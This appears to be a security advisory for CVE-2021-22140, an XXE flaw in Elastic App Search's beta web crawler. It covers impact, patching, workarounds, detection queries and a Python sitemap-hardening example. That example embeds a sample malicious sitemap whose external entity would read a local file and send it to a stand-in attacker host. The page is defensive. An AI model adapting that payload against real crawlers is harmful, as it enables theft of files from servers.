CVE-2021-22140

7.5 HIGH
XXE

📋 TL;DR

This XXE vulnerability in Elastic App Search's web crawler beta feature allows attackers to read sensitive files on the host system. Attackers can exploit this by hosting a malicious sitemap.xml that gets crawled by App Search. Only organizations using the web crawler beta feature on affected versions are impacted.

💻 Affected Systems

Products:
  • Elastic App Search
Versions: after 7.11.0 and before 7.12.0
Operating Systems: All platforms running Elastic App Search
Default Config Vulnerable: ✅ No
Notes: Only affects systems with the web crawler beta feature enabled and actively crawling websites.

⚠️ Risk & Real-World Impact

🔴 Worst Case: Complete filesystem traversal leading to exposure of sensitive files like SSH keys, configuration files, and credentials stored on the host.

🟠 Likely Case: Partial filesystem access allowing attackers to read application configuration files and potentially discover other vulnerabilities.

🟢 If Mitigated: Limited impact if the web crawler is disabled or only crawls trusted internal sites.

🌐 Internet-Facing: HIGH - Web crawlers typically access external websites, making exploitation trivial if malicious sitemaps exist.
🏢 Internal Only: MEDIUM - Risk exists if crawling internal sites, but requires attacker access to internal infrastructure.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires the attacker to control a website being crawled by App Search, making it situational but technically simple.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 7.12.0 or later

Vendor Advisory: https://discuss.elastic.co/t/7-12-1-security-update/271433

Restart Required: Yes

Instructions:

1. Upgrade Elastic App Search to version 7.12.0 or later.
2. Restart the App Search service.
3. Verify the version is updated.

🔧 Temporary Workarounds

Disable Web Crawler Beta Feature

Platform: all

Disable the vulnerable web crawler feature until patching is possible.

Edit the App Search configuration to disable the web crawler or remove crawler configurations.

Restrict Crawling to Trusted Sites

Platform: all

Configure the crawler to only access known, trusted websites.

Update the crawler configuration to whitelist specific domains only.
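The hardening the fix implies, as an added example that is not App Search code: a sitemap.xml loader that refuses the XML constructs an XXE payload depends on (DOCTYPE and entity declarations) before extracting any URLs. Both sitemaps below are constructed samples, and the entity target in the malicious one is a placeholder rather than a real path.

```python
import xml.parsers.expat as expat
from xml.etree import ElementTree as ET

SITEMAP_NS = "{http://www.sitemaps.org/schemas/sitemap/0.9}"

class UnsafeSitemap(Exception):
    """Sitemap uses DOCTYPE/entities, which a valid sitemap never needs."""

def _reject(reason):
    def handler(*_args):
        # An exception raised inside an expat handler propagates out of Parse().
        raise UnsafeSitemap(reason)
    return handler

def reject_xxe_constructs(data: bytes) -> None:
    """Stream the bytes through expat with handlers that abort on any
    DOCTYPE or entity declaration; nothing is resolved or fetched."""
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = _reject("DOCTYPE declaration in sitemap")
    parser.EntityDeclHandler = _reject("entity declaration in sitemap")
    parser.Parse(data, True)

def parse_sitemap(data: bytes) -> list:
    """Return the <loc> URLs of a sitemap once the hardening check passes."""
    reject_xxe_constructs(data)
    root = ET.fromstring(data)
    return [loc.text.strip() for loc in root.iter(SITEMAP_NS + "loc") if loc.text]

def is_safe(data: bytes) -> bool:
    try:
        reject_xxe_constructs(data)
        return True
    except UnsafeSitemap:
        return False

# Constructed sample input (not from the advisory): a benign sitemap.
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url><loc>https://example.test/page-1</loc></url>
  <url><loc>https://example.test/page-2</loc></url>
</urlset>"""

# Constructed: the shape of the XXE sitemap the TL;DR describes; target is a placeholder.
MALICIOUS = b"""<?xml version="1.0"?>
<!DOCTYPE urlset [<!ENTITY xxe SYSTEM "file:///PLACEHOLDER_PATH">]>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url><loc>https://attacker.test/?d=&xxe;</loc></url>
</urlset>"""
```

The check runs before any tree is built, so a hostile DOCTYPE is rejected without the parser ever seeing an entity reference to expand.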

🧯 If You Can't Patch

  • Disable the web crawler beta feature entirely
  • Implement network segmentation to isolate App Search from sensitive systems

🔍 How to Verify

Check if Vulnerable:

Check whether the App Search version is after 7.11.0 and before 7.12.0 and the web crawler is enabled.

Check Version:

curl -X GET 'http://localhost:3002/api/ent/v1/internal/engine' | grep version

Verify Fix Applied:

Verify App Search version is 7.12.0 or later and test crawling functionality.

📡 Detection & Monitoring

Log Indicators:

  • Unusual file access patterns in system logs
  • XXE parsing errors in App Search logs

Network Indicators:

  • Crawler requests to suspicious or unexpected domains

SIEM Query:

source="app-search" AND ("sitemap.xml" OR "XXE" OR "external entity")
